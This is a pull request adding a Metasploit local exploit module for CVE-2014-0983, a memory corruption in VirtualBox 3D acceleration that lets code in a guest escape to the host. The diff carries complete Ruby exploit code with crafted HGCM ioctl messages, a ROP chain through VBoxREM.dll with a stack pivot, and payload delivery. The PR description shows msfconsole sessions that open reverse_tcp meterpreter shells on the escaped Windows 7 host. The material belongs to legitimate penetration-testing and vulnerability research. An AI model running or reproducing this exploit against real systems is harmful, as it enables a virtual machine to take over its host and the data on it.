### PR TITLE
Virtual box 3D Acceleration OpenGL Host escape

### DIFF
--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -1,0 +1,459 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  DEVICE               = '\\\\.\\VBoxGuest'
+  INVALID_HANDLE_VALUE = 0xFFFFFFFF
+  FILE_SHARE_READ      = 0x00000001
+  FILE_SHARE_WRITE     = 0x00000002
+
+  # VBOX HGCM protocol constants
+  VBOXGUEST_IOCTL_HGCM_CONNECT    = 2269248
+  VBOXGUEST_IOCTL_HGCM_DISCONNECT = 2269252
+  VBOXGUEST_IOCTL_HGCM_CALL       = 2269256
+  CONNECT_MSG_SIZE                = 140
+  DISCONNECT_MSG_SIZE             = 8
+  SET_VERSION_MSG_SIZE            = 40
+  SET_PID_MSG_SIZE                = 28
+  CALL_EA_MSG_SIZE                = 40
+  VERR_WRONG_ORDER                = 0xffffffea
+  SHCRGL_GUEST_FN_SET_PID         = 12
+  SHCRGL_CPARMS_SET_PID           = 1
+  SHCRGL_GUEST_FN_SET_VERSION     = 6
+  SHCRGL_CPARMS_SET_VERSION       = 2
+  SHCRGL_GUEST_FN_INJECT          = 9
+  SHCRGL_CPARMS_INJECT            = 2
+  CR_PROTOCOL_VERSION_MAJOR       = 9
+  CR_PROTOCOL_VERSION_MINOR       = 1
+  VMM_DEV_HGCM_PARM_TYPE_32_BIT   = 1
+  VMM_DEV_HGCM_PARM_TYPE_64_BIT   = 2
+  VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR = 5
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'VirtualBox 3D Acceleration Virtual Machine Escape',
+      'Description'    => %q{
+        This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
+        vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
+        sequence of specially crafted of rendering messages, a virtual machine can exploit an out
+        of bounds array access to corrupt memory and escape to the host. This module has been
+        tested successfully on Windows 7 SP1 (64 bits) as Host running  Virtual Box 4.3.6.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Francisco Falcon', # Vulnerability Discovery and PoC
+          'Florian Ledoux', # Win 8 64 bits exploitation analysis
+          'juan vazquez' # MSF module
+        ],
+      'Arch'           => ARCH_X86_64,
+      'Platform'       => 'win',
+      'SessionTypes'   => ['meterpreter'],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Targets'        =>
+        [
+          [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',
+            {
+              :messages => :target_virtualbox_436_win7_64
+            }
+          ]
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 7000,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          ['CVE', '2014-0983'],
+          ['BID', '66133'],
+          ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
+          ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'],
+          ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php']
+        ],
+      'DisclosureDate' => 'Mar 11 2014',
+      'DefaultTarget'  => 0
+    }))
+
+  end
+
+  def open_device
+    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", FILE_SHARE_READ | FILE_SHARE_WRITE, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
+
+    handle = r['return']
+
+    if handle == INVALID_HANDLE_VALUE
+      return nil
+    end
+
+    return handle
+  end
+
+  def send_ioctl(ioctl, msg)
+    result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")
+
+    print_status("#{result}")
+
+    if result["GetLastError"] != 0
+      unless result["ErrorMessage"].blank?
+        vprint_error("#{result["ErrorMessage"]}")
+      end
+      return nil
+    end
+
+    unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length
+      unless result["ErrorMessage"].blank?
+        vprint_error("#{result["ErrorMessage"]}")
+      end
+      return nil
+    end
+
+    unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0
+      unless result["ErrorMessage"].blank?
+        vprint_error("#{result["ErrorMessage"]}")
+      end
+      return nil
+    end
+
+    result
+  end
+
+  def connect
+    msg = "\x00" * CONNECT_MSG_SIZE
+
+    msg[4, 4] = [2].pack("V")
+    msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL"
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg)
+
+    if result.nil?
+      return result
+    end
+
+    client_id = result["lpOutBuffer"][136, 4].unpack("V").first
+
+    client_id
+  end
+
+  def disconnect
+    msg = "\x00" * DISCONNECT_MSG_SIZE
+
+    msg[4, 4] = [@client_id].pack("V")
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg)
+
+    result
+  end
+
+  def set_pid(pid)
+    msg = "\x00" * SET_PID_MSG_SIZE
+
+    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    msg[4, 4]  = [@client_id].pack("V")  # u32ClientID
+    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_PID].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V")
+    msg[20, 4] = [pid].pack("V")
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
+
+    result
+  end
+
+  def set_version
+    info = "\x00" * SET_VERSION_MSG_SIZE
+
+    info[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    info[4, 4]  = [@client_id].pack("V") # u32ClientID
+    info[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
+    info[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
+    info[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    info[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
+    info[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    info[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
+
+    ioctl = session.railgun.kernel32.DeviceIoControl(@handle, VBOXGUEST_IOCTL_HGCM_CALL, info, info.length, info.length, info.length, 4, "")
+
+    if ioctl["GetLastError"] != 0
+      fail_with(Failure::Unknown, "Something wrong while set_version")
+    end
+
+    unless ioctl["lpBytesReturned"] && ioctl["lpBytesReturned"] == SET_VERSION_MSG_SIZE
+      fail_with(Failure::Unknown, "Something wrong while set version")
+    end
+
+    unless ioctl["lpOutBuffer"] && ioctl["lpOutBuffer"].unpack("V").first == 0
+      fail_with(Failure::Unknown, "Something wrong while set version")
+    end
+
+    true
+  end
+
+  def trigger(buff_addr, buff_length)
+    msg = "\x00" * CALL_EA_MSG_SIZE
+
+    msg[4, 4] = [@client_id].pack("V")  # u32ClientID
+    msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[20, 4] = [@client_id].pack("V") # u32ClientID
+    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V")
+    msg[32, 4] = [buff_length].pack("V") # size_of(buf)
+    msg[36, 4] = [buff_addr].pack("V") # (buf)
+
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
+
+    result
+  end
+
+  def stack_adjustment
+    pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00"  # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB
+    pivot << "\x89\xc4"                         # mov esp, eax                 # Store stack bottom in esp
+    pivot << "\x81\xC4\x30\xF8\xFF\xFF"         # add esp, -2000               # Plus a little offset...
+
+    pivot
+  end
+
+  def target_virtualbox_436_win7_64(message_id)
+    opcodes = [0xFF, 0xea, 0x02, 0xf7]
+
+    opcodes_hdr = [
+      0x77474c01,    # type CR_MESSAGE_OPCODES
+      0x8899,        # conn_id
+      opcodes.length # numOpcodes
+    ]
+
+    if message_id == 2
+      # Message used to achieve Code execution
+      # See at the end of the module for a better description of the ROP Chain,
+      # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php
+      # All gadgets from VBoxREM.dll
+      opcodes_data = [0x8, 0x30, 0x331].pack("V*")
+
+      opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
+      opcodes_data << [112].pack("Q<") # RDX
+      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret
+      opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret
+      opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
+      opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret
+      opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
+      opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
+      opcodes_data << Rex::Text.pattern_create(80)
+      opcodes_data << [0].pack("Q<")          # 1st arg (lpAddress) # chain will store stack address here
+      opcodes_data << Rex::Text.pattern_create(104 - 80 - 8)
+      opcodes_data << [0x2000].pack("Q<")     # 2nd arg (dwSize)
+      opcodes_data << Rex::Text.pattern_create(140 - 104 - 8)
+      opcodes_data << [0x40].pack("V")        # 3rd arg (flNewProtect)
+      opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64)
+      opcodes_data << [0x6A70BB20].pack("V")  # ptr to jmp VirtualProtect instr.
+      opcodes_data << "A" * 8
+      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9
+      opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10
+      opcodes_data << "\xe9\x5b\x02\x00\x00"  # jmp $+608
+      opcodes_data << "A" * (624 - 24 - 5)
+      opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot
+      opcodes_data << stack_adjustment
+      opcodes_data << payload.encoded
+      opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length)
+    else
+      # Message used to corrupt head_spu
+      # 0x2a9 => offset to head_spu in VBoxSharedCrOpenGL.dll .data
+      # 8196 => On my tests, this data size allows to keep the memory
+      # not reused until the second packet arrives. The second packet,
+      # of course, must have 8196 bytes length too. So this memory is
+      # reused and code execution can be accomplished.
+      opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*")
+      opcodes_data << "B" * (8196 - opcodes_data.length)
+    end
+
+    msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data
+
+    msg
+  end
+
+  def send_opcodes_msg(process, message_id)
+    msg = self.send(target[:messages], message_id)
+
+    mem = process.memory.allocate(msg.length + (msg.length % 1024))
+
+    process.memory.write(mem, msg)
+
+    trigger(mem, msg.length)
+  end
+
+  def check
+    handle = open_device
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    Exploit::CheckCode::Detected
+  end
+
+  def exploit
+    unless self.respond_to?(target[:messages])
+      print_error("Invalid target specified: no messages callback function defined")
+      return
+    end
+
+    print_status("Opening device...")
+    @handle = open_device
+    if @handle.nil?
+      fail_with(Failure::NoTarget, "#{DEVICE} device not found")
+    else
+      print_good("#{DEVICE} found, exploiting...")
+    end
+
+    print_status("Connecting to the service...")
+    @client_id = connect
+    if @client_id.nil?
+      fail_with(Failure::Unknown, "Connect operation failed")
+    end
+
+    print_good("Client ID #{@client_id}")
+
+    print_status("Calling SET_VERSION...")
+    result = set_version
+    if result.nil?
+      fail_with(Failure::Unknown, "Failed to SET_VERSION")
+    end
+
+    this_pid = session.sys.process.getpid
+    print_status("Calling SET_PID...")
+    result = set_pid(this_pid)
+    if result.nil?
+      fail_with(Failure::Unknown, "Failed to SET_PID")
+    end
+
+    this_proc = session.sys.process.open
+    print_status("Sending First 0xEA Opcode Message to control head_spu...")
+    result = send_opcodes_msg(this_proc, 1)
+    if result.nil?
+      fail_with(Failure::Unknown, "Failed to control heap_spu...")
+    end
+
+    print_status("Sending Second 0xEA Opcode Message to execute payload...")
+    @old_timeout = session.response_timeout
+    session.response_timeout = 5
+    begin
+      send_opcodes_msg(this_proc, 2)
+    rescue Rex::TimeoutError
+      vprint_status("Expected timeout in case of successful exploitation")
+    end
+  end
+
+  def cleanup
+    unless @old_timeout.nil?
+      session.response_timeout = @old_timeout
+    end
+
+    if session_created?
+      # Unless we add CoE there is nothing to do
+      return
+    end
+
+    unless @client_id.nil?
+      print_status("Disconnecting from the service...")
+      disconnect
+    end
+
+    unless @handle.nil?
+      print_status("Closing the device...")
+      session.railgun.kernel32.CloseHandle(@handle)
+    end
+  end
+
+end
+
+=begin
+
+* VirtualBox 4.3.6 / Windows 7 SP1 64 bits
+
+Crash after second message:
+
+0:013> dd rax
+00000000`0e99bd44  41306141 61413161 33614132 41346141
+00000000`0e99bd54  61413561 37614136 41386141 62413961
+00000000`0e99bd64  31624130 41326241 62413362 35624134
+00000000`0e99bd74  41366241 62413762 39624138 41306341
+00000000`0e99bd84  63413163 33634132 41346341 63413563
+00000000`0e99bd94  37634136 41386341 64413963 31644130
+00000000`0e99bda4  41326441 64413364 35644134 41366441
+00000000`0e99bdb4  64413764 39644138 41306541 65413165
+0:013> r
+rax=000000000e99bd44 rbx=0000000000000001 rcx=000007fef131e8ba
+rdx=000000006a72fb62 rsi=000000000e5531f0 rdi=0000000000000000
+rip=000007fef12797f8 rsp=0000000004b5f620 rbp=0000000041424344 << already controlled...
+ r8=0000000000000001  r9=00000000000005c0 r10=0000000000000000
+r11=0000000000000246 r12=0000000000000000 r13=00000000ffffffff
+r14=000007fef1f90000 r15=0000000002f6e280
+iopl=0         nv up ei pl nz na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+VBoxSharedCrOpenGL!crServerAddNewClient+0x208:
+000007fe`f12797f8 ff9070030000    call    qword ptr [rax+370h] ds:00000000`0e99c0b4=7641397541387541
+
+Gadget 1: Stack Pivot # 0x6a682a2a
+
+ xchg    eax,esp    94
+ ret                c3
+
+Gadget 2: Control RDX value # 0x6a68599a
+
+ pop rdx                    5a
+ xor ecx,dword ptr [rax]    33 08
+ add cl,cl                  00 c9
+ movzx eax,al               0f b6 c0
+ ret                        c3
+
+Gadget 3: Store ptr to RSP in RAX # 0x6a70a560
+
+ lea rax,[rsp+8]            48 8d 44 24 08
+ ret                        c3
+
+Gadget 4: Store ptr to RSP + RDX offset (controlled) in RAX # 0x6a692b1c
+
+ lea rax,[rdx+rax]          48 8d 04 02
+ ret                        c3
+
+Gadget 5: Write Stack Address (EAX) to the stack # 0x6a6931d6
+
+ add dword ptr [rax],eax    01 00
+ add cl,cl                  00 c9
+ ret                        c3
+
+Gadget 6: Control R12 # 0x6a68124e
+
+pop r12
+ret
+
+Gadget 7: Recover VirtualProtect arguments from the stack and call it (ebp) # 0x6a70927d
+
+ mov r9,r12                   4d 89 e1
+ mov r8d,dword ptr [rsp+8Ch]  44 8b 84 24 8c 00 00 00
+ mov rdx,qword ptr [rsp+68h]  48 8b 54 24 68
+ mov rcx,qword ptr [rsp+50h]  48 8b 4c 24 50
+ call rbp                     ff d5
+
+Gadget 8: After VirtualProtect, get pointer to the shellcode in the # 0x6a70a560
+
+ lea rax, [rsp+8]   48 8d 44 24 08
+ ret                c3
+
+ Gadget 9: Push the pointer and provide control to shellcode # 0x6a6c9d3d
+
+ push rax   50
+ adc cl,ch  10 e9
+ ret        c3
+
+=end

--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -102,8 +102,6 @@ class Metasploit3 < Msf::Exploit::Local
   def send_ioctl(ioctl, msg)
     result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")
 
-    print_status("#{result}")
-
     if result["GetLastError"] != 0
       unless result["ErrorMessage"].blank?
         vprint_error("#{result["ErrorMessage"]}")

--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -169,32 +169,20 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def set_version
-    info = "\x00" * SET_VERSION_MSG_SIZE
+    msg = "\x00" * SET_VERSION_MSG_SIZE
 
-    info[0, 4]  = [VERR_WRONG_ORDER].pack("V")
-    info[4, 4]  = [@client_id].pack("V") # u32ClientID
-    info[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
-    info[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
-    info[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
-    info[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
-    info[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
-    info[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
+    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    msg[4, 4]  = [@client_id].pack("V") # u32ClientID
+    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
+    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
 
-    ioctl = session.railgun.kernel32.DeviceIoControl(@handle, VBOXGUEST_IOCTL_HGCM_CALL, info, info.length, info.length, info.length, 4, "")
+    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
 
-    if ioctl["GetLastError"] != 0
-      fail_with(Failure::Unknown, "Something wrong while set_version")
-    end
-
-    unless ioctl["lpBytesReturned"] && ioctl["lpBytesReturned"] == SET_VERSION_MSG_SIZE
-      fail_with(Failure::Unknown, "Something wrong while set version")
-    end
-
-    unless ioctl["lpOutBuffer"] && ioctl["lpOutBuffer"].unpack("V").first == 0
-      fail_with(Failure::Unknown, "Something wrong while set version")
-    end
-
-    true
+    result
   end
 
   def trigger(buff_addr, buff_length)

--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -11,8 +11,6 @@ class Metasploit3 < Msf::Exploit::Local
 
   DEVICE               = '\\\\.\\VBoxGuest'
   INVALID_HANDLE_VALUE = 0xFFFFFFFF
-  FILE_SHARE_READ      = 0x00000001
-  FILE_SHARE_WRITE     = 0x00000002
 
   # VBOX HGCM protocol constants
   VBOXGUEST_IOCTL_HGCM_CONNECT    = 2269248
@@ -88,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def open_device
-    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", FILE_SHARE_READ | FILE_SHARE_WRITE, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
+    r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)
 
     handle = r['return']
 


### PR DESCRIPTION
Module for vulnerability discussed here: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration
And exploitation discussed here: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php

At the moment this module doesn't add the CoE proposed by VUPEN, even when it looks feasible from the description. With the actual payload system, looks like the place to add the post-exploitation code to fix the corrupted process should be by adding the stub as "Append". Unfortunately, the Append stub code only will be reached when the user "exit" from the achieved meterpreter. Using migrate as initial script doesn't help, since the original process will crash before reaching the "Append" stub, so there is no opportunity to restore the process. Modifying the current payload system is out of the scope of this pull request atm, but definitely would like to look into it. Feedback is welcome!

Also, even without the CoE code proposed by VUPEN, by just "fixing" the stack, things are not "so busted" and the guest will continue executing unless other code tries to use the '\.\VBoxGuest' device. Even with it, I've marked `Rank` as `AverageRanking` . I don't mind to lower it even more if anyone thinks it should be done. The session can be executed and even exited in the Host system, and both the host and guest keep running on my tests (Unless the Guest tries to access the named device of course, in this case the Guest probably will die :-( )
- Verification
- [x] Install Windows 7 SP1 64 bits system as host
- [x] Instal Virtual Box 4.3.6 from bin packages
- [x] Install Windows XP SP 32 bits as Guest (I've not tried with other windows system as virtual boxes, even when I think the exploit should work, will update with feedback once I get some time for more testing).
- [x] While powered-off, enable 3D Acceleration for the Virtual Box Guest. Use the VirtualBox manager. From the guest's settings, goto "Display" and select the check box "Enable 3D Acceleration"
- [x] In the Virtual Box guest install the Virtual Box Guest Tools with support for 3D. The guest tools must be installed on safe mode. On windows XP SP3 just press F8 while init to run on "safe mode".
- [x] Get a session on the Guest (XP SP 32 bits) and background it

```
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 172.16.158.226
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.226:49166) at 2014-08-09 01:57:27 -0500

meterpreter > background
```
- [ ] Use the local exploit to escape to the Host (Use a 64 bits payload)

```
msf exploit(handler) > use exploit/windows/local/virtual_box_opengl_escape
msf exploit(virtual_box_opengl_escape) > set session 1
session => 1
msf exploit(virtual_box_opengl_escape) > set payload windows/x64/meterpreter/reverse_
^C[-] Error while running command set:
msf exploit(virtual_box_opengl_escape) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(virtual_box_opengl_escape) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(virtual_box_opengl_escape) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Opening device...
[+] \\.\VBoxGuest found, exploiting...
[*] Connecting to the service...
[+] Client ID 19
[*] Calling SET_VERSION...
[*] Calling SET_PID...
[*] Sending First 0xEA Opcode Message to control head_spu...
[*] Sending Second 0xEA Opcode Message to execute payload...
[*] Sending stage (972288 bytes) to 172.16.158.226
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.226:49167) at 2014-08-09 01:58:00 -0500
```
- [ ] Check with the new session (Host) is usable and exit it:

```
[*] Sending stage (972288 bytes) to 172.16.158.226
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.226:49167) at 2014-08-09 01:58:00 -0500

meterpreter > getuid
Server username: WIN-369V5BV1B34\juan
meterpreter > sysinfo
Computer        : WIN-369V5BV1B34
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.226 - Meterpreter session 2 closed.  Reason: User exit
```
- [ ] Check which the original session in the Guest is usable still

```
msf exploit(virtual_box_opengl_escape) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: J-2BD499D1E94E4\juan
meterpreter > sysinfo
Computer        : J-2BD499D1E94E4
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(virtual_box_opengl_escape) > exit -y
AUS-MAC-0916:metasploit-framework jvazquez$
```
